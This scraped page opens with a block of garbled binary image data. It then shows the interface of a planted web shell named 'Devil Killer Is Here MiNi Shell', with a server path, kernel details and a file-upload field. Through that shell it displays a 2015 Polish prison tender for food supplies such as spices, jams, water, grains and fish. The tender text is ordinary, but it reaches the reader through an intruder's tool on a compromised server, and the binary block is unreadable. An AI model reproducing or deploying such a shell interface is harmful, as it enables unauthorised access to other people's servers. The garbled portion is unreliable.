JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151117/309828-N-2015.html

<p class="kh_header"><b>Kłodzko: DD/ZP 220/11/2015 POSTĘPOWANIE NA DOSTWĘ ARTYKUŁÓW SPOŻYWCZYCH I RYB.</b><br>
<b>Numer ogłoszenia: 309828 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Kłodzku , ul. Bohaterów Getta 16, 57-300 Kłodzko, woj. dolnośląskie, tel. 074 8651800, 8651854, faks 074 8673017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ZAKŁAD KARNY W KŁODZKU.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DD/ZP 220/11/2015 POSTĘPOWANIE NA DOSTWĘ ARTYKUŁÓW SPOŻYWCZYCH I RYB..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I: PRZYPRAWY:
1) 
Bulion grzybowy CPV 15872200-3
opakowanie jednostkowe
1-20 kg
2) 
Barszcz biały CPV 158910000
opakowanie jednostkowe
1-5 kg
3) 
Cynamon CPV 15872000-1
opakowanie jednostkowe
1-5 kg
4) 
Czosnek mielony CPV 15332140-7
opakowanie jednostkowe
1-5 kg
5) 
Jabłka prażone CPV 1500000-8
opakowanie jednostkowe
10-12 kg
6) 
Keczup CPV 15871230-5
opakowanie jednostkowe
1 kg
7) 
Kminek CPV 15872200-3
opakowanie jednostkowe
1-20 kg
8) 
Koperek suszony CPV 1587000-7
opakowanie jednostkowe
0,5-1 kg
9) 
Liść laurowy CPV 1587000-7
opakowanie jednostkowe
0,5-1 kg
10) 
Przyprawa do zupy w płynie CPV 1587000-7
opakowanie jednostkowe
1-5 L
11) 
Majeranek CPV158910000
opakowanie jednostkowe
0,5-5 kg
12) 
Majonez CPV 15871273-8
opakowanie jednostkowe
1 kg
13) 
Musztarda CPV15871250-1
opakowanie jednostkowe
1 kg
14) 
Ocet CPV15871110-8
opakowanie jednostkowe
0,5-1 L
15) 
Papryka CPV 15872100-2
opakowanie jednostkowe
1-5 kg
16) 
Pieprz CPV15871200-6
opakowanie jednostkowe
1-5 kg
17) 
Przecier ogórkowy CPV153310007
opakowanie jednostkowe
0,9 kg
18) 
Przyprawa do kurczaka CPV15871200-6
opakowanie jednostkowe
1-5 kg
19) 
Przyprawy sypkie-typu jarzynka CPV 15891000-0
opakowanie jednostkowe
1-5 kg
20) 
Rosół wołowy CPV 15872400-5
opakowanie jednostkowe
1-5 kg
21) 
Sosy - pieczeniowy CPV 15870000-7
opakowanie jednostkowe
1-5 kg
22) 
Sól CPV 15871260-4
opakowanie jednostkowe
1 kg
23) 
Ziele angielskie CPV 158700007
opakowanie jednostkowe
1-5 kg
24) 
Zupa pieczarkowa CPV 158910000
opakowanie jednostkowe
1-5 kg
25) 
Żurek CPV 158700007
opakowanie jednostkowe
1-5 kg
26) 
Przyprawa do gulaszu CPV 158910000
opakowanie jednostkowe
0,1-1 kg
27) 
Danie błyskawiczne CPV 15891400-4
opakowanie jednostkowe
0,06-0,08 kg
28) 
Herbata CPV 15860000-4
opakowanie jednostkowe
1-25 kg

Dostarczony towar ma być w opakowaniach. Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 6 mies. od dostawy;
warunki przechowywania;
skład i waga.

Danie błyskawiczne (pozycja 27) - danie gotowe zawierające makaron, gotowe do spożycia po zalaniu wrzącą wodą nie wymagające gotowania. Z jednego opakowania po zalaniu gorącą wodą powinna wyjść jedna porcja makaronu z gęstym sosem. Jedno opakowanie to danie dla jednej osoby. Gramatura jednostkowa opakowania ok 0,06 kg-0,08 kg, o wydajności 100 g zupy błyskawicznej = ok. 500 ml gotowej zupy (do spożycia).
Nie może to być zupka błyskawiczna np. rosół, pomidorowa, gulaszowa itp. Powinno to być danie do szybkiego spożycia pakowane z makaronem i przyprawami w opakowaniu foliowym. Opakowanie jednostkowe - torba polietylenowa spawana, torebka foliowa (materiał opakowaniowy dopuszczony do kontaktu z żywnością).


CZĘŚĆ II: CUKRY
1) 
Dżem truskawkowy CPV 15332290-3
opakowanie 
wiaderko z pokrywką 5-15 kg
2) 
Dżem wieloowocowy CPV 15332290-3
opakowanie
wiaderko z pokrywką 5-15 kg
3) 
Marmolada pomarańczowa CPV15332231-2
opakowanie
wiaderko z pokrywką 5-15 kg
4) 
Cukier CPV 15830000-5
opakowanie
1-10 kg
5) 
Syrop/ zaprawa do napojów CPV 15831500-7
opakowanie
szczelnie zakręcane 0,5-5 L

Wszystkie artykułu oznakowane etykietą producenta zgodnie z przepisami, termin przydatności do spożycia określony na etykiecie - min. 3 miesiące od daty dostawy. 


CZĘŚĆ III: NAPOJE
1) 
Woda mineralna CPV 15981200-0
opakowanie jednostkowe
1,5 L

Woda mineralna gazowana o każdym stopniu mineralizacji. Opakowanie jednostkowe 1,5 litra - pakowane zbiorczo w zgrzewki 6 szt. Wszystkie artykuły oznakowane etykietą producenta zgodnie z przepisami. Termin przydatności do spożycia określony na etykiecie - min. 6 mies. od daty dostawy.

CZĘŚĆ IV: ZBOŻOWE-STRĄCZKOWE

1) 
Ryż biały długoziarnisty CPV 15614100-6
opakowanie jednostkowe
1-20 kg
2) 
Fasola biała CPV 03221210-1
opakowanie jednostkowe
5-20 kg
3) 
Groch łuskany CPV 03221220-4
opakowanie jednostkowe
5-20 kg
4) 
Kasza jęczmienna średnia CPV 15613000-8
Opakowanie jednostkowe
5-20 kg
5) 
Kasza manna CPV 15613000-8
opakowanie jednostkowe
1-20 kg
6) 
Mąka pszenna typ 450-550 CPV 15614100-6
opakowanie jednostkowe
1-20 kg
7) 
Mąka ziemniaczana CPV 15620000-0
opakowanie jednostkowe
1-20 kg
8) 
Płatki owsiane CPV 15613380-5
opakowanie jednostkowe
0,5-10 kg
9) 
Makaron Krajanka CPV 15613300-1
opakowanie jednostkowe
10-20 kg
10) 
Makaron Świderki CPV 15613300-1
opakowanie jednostkowe
10-20 kg
11) 
Makaron Łazanka CPV15613300-1
opakowanie jednostkowe
10-20 kg
12) 
Bułka tarta CPV 15811500-1
opakowanie jednostkowe
0,5-5 kg
13) 
Kawa zbożowa CPV 15862000-8
opakowanie jednostkowe
0,5-25 kg
14) 
Kotlety sojowe CPV 15610000-7
opakowanie jednostkowe
10-25 kg
15) 
Kostka sojowa CPV 15610000-7
opakowanie jednostkowe
10-25 kg
16) 
Granulat sojowy CPV 15610000-7
opakowanie jednostkowe
10-25 kg

Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin ważności, przydatności do spożycia min. 3 mies. od dostawy;
warunki przechowywania;
skład i waga.

CZĘŚĆ V: RYBY
1) Ryba filet - część ryby w postaci płatu mięsa, nie zawierający ości, skór, płetw i głowy, mrożona z max ilością glazury do 10% CPV 15211000-0;
2) Burgery rybne - mrożony kotlet rybny w gotowej panierce, w kształcie prostokąta lub owalne o wymiarach nie przekraczających 10 cm CPV 15240000-2.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.87.22.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonał opisu sposobu oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonał opisu sposobu oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonał opisu sposobu oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonał opisu sposobu oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonał opisu sposobu oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 1 oraz 2 prawidłowo wypełnione</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z Zastrzeżeniem art 144 ustawy  Prawo Zamówień Publicznych zamawiający dopuszcza    możliwość zmiany postanowień zawartej umowy z zachowaniem następujących uwarunkowań:
1) wszelkie zmiany dopuszcza się nie wcześniej niż po upływie połowy okresu na jaki została zawarta umowa.
2) Wszelkich zmian zawartej umowy można dokonać tylko jeden raz w trakcie trwania umowy.
3) Zmian dokonuje się na pisemny wniosek Wykonawcy, który powinien zawierać szczegółową analizę warunków rynkowych oraz wszelką dokumentację (kserokopie pism producentów, innych dostawców itp.) potwierdzającą zmiany na jakie powołuje się Wykonawca,
4) zmian dokonuje się również z inicjatywy Zamawiającego w przypadkach określonych w §7 ust. 3 i 4 projektu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład karny kłodzko 
ul. Boh. Getta 16
57-300 Kłodzko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2015 godzina 11:00, miejsce: Zakład karny kłodzko 
ul. Boh. Getta 16
57-300 Kłodzko
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I: PRZYPRAWY:
1) 
Bulion grzybowy CPV 15872200-3
opakowanie jednostkowe
1-20 kg
2) 
Barszcz biały CPV 158910000
opakowanie jednostkowe
1-5 kg
3) 
Cynamon CPV 15872000-1
opakowanie jednostkowe
1-5 kg
4) 
Czosnek mielony CPV 15332140-7
opakowanie jednostkowe
1-5 kg
5) 
Jabłka prażone CPV 1500000-8
opakowanie jednostkowe
10-12 kg
6) 
Keczup CPV 15871230-5
opakowanie jednostkowe
1 kg
7) 
Kminek CPV 15872200-3
opakowanie jednostkowe
1-20 kg
8) 
Koperek suszony CPV 1587000-7
opakowanie jednostkowe
0,5-1 kg
9) 
Liść laurowy CPV 1587000-7
opakowanie jednostkowe
0,5-1 kg
10) 
Przyprawa do zupy w płynie CPV 1587000-7
opakowanie jednostkowe
1-5 L
11) 
Majeranek CPV158910000
opakowanie jednostkowe
0,5-5 kg
12) 
Majonez CPV 15871273-8
opakowanie jednostkowe
1 kg
13) 
Musztarda CPV15871250-1
opakowanie jednostkowe
1 kg
14) 
Ocet CPV15871110-8
opakowanie jednostkowe
0,5-1 L
15) 
Papryka CPV 15872100-2
opakowanie jednostkowe
1-5 kg
16) 
Pieprz CPV15871200-6
opakowanie jednostkowe
1-5 kg
17) 
Przecier ogórkowy CPV153310007
opakowanie jednostkowe
0,9 kg
18) 
Przyprawa do kurczaka CPV15871200-6
opakowanie jednostkowe
1-5 kg
19) 
Przyprawy sypkie-typu jarzynka CPV 15891000-0
opakowanie jednostkowe
1-5 kg
20) 
Rosół wołowy CPV 15872400-5
opakowanie jednostkowe
1-5 kg
21) 
Sosy - pieczeniowy CPV 15870000-7
opakowanie jednostkowe
1-5 kg
22) 
Sól CPV 15871260-4
opakowanie jednostkowe
1 kg
23) 
Ziele angielskie CPV 158700007
opakowanie jednostkowe
1-5 kg
24) 
Zupa pieczarkowa CPV 158910000
opakowanie jednostkowe
1-5 kg
25) 
Żurek CPV 158700007
opakowanie jednostkowe
1-5 kg
26) 
Przyprawa do gulaszu CPV 158910000
opakowanie jednostkowe
0,1-1 kg
27) 
Danie błyskawiczne CPV 15891400-4
opakowanie jednostkowe
0,06-0,08 kg
28) 
Herbata CPV 15860000-4
opakowanie jednostkowe
1-25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.22.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cukry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dżem truskawkowy CPV 15332290-3
opakowanie 
wiaderko z pokrywką 5-15 kg
Dżem wieloowocowy CPV 15332290-3
opakowanie
wiaderko z pokrywką 5-15 kg
Marmolada pomarańczowa CPV15332231-2
opakowanie
wiaderko z pokrywką 5-15 kg
Cukier CPV 15830000-5
opakowanie
1-10 kg
Syrop/ zaprawa do napojów CPV 15831500-7
opakowanie
szczelnie zakręcane 0,5-5 L.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.90-3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III: NAPOJE
1) 
Woda mineralna CPV 15981200-0
opakowanie jednostkowe
1,5 L.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zbożowe i strączkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryż biały długoziarnisty CPV 15614100-6
opakowanie jednostkowe
1-20 kg
Fasola biała CPV 03221210-1
opakowanie jednostkowe
5-20 kg
Groch łuskany CPV 03221220-4
opakowanie jednostkowe
5-20 kg
Kasza jęczmienna średnia CPV 15613000-8
Opakowanie jednostkowe
5-20 kg
Kasza manna CPV 15613000-8
opakowanie jednostkowe
1-20 kg
Mąka pszenna typ 450-550 CPV 15614100-6
opakowanie jednostkowe
1-20 kg
Mąka ziemniaczana CPV 15620000-0
opakowanie jednostkowe
1-20 kg
Płatki owsiane CPV 15613380-5
opakowanie jednostkowe
0,5-10 kg
Makaron Krajanka CPV 15613300-1
opakowanie jednostkowe
10-20 kg
Makaron Świderki CPV 15613300-1
opakowanie jednostkowe
10-20 kg
Makaron Łazanka CPV15613300-1
opakowanie jednostkowe
10-20 kg
Bułka tarta CPV 15811500-1
opakowanie jednostkowe
0,5-5 kg
Kawa zbożowa CPV 15862000-8
opakowanie jednostkowe
0,5-25 kg
Kotlety sojowe CPV 15610000-7
opakowanie jednostkowe
10-25 kg
Kostka sojowa CPV 15610000-7
opakowanie jednostkowe
10-25 kg
Granulat sojowy CPV 15610000-7
opakowanie jednostkowe
10-25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ryby.</p>
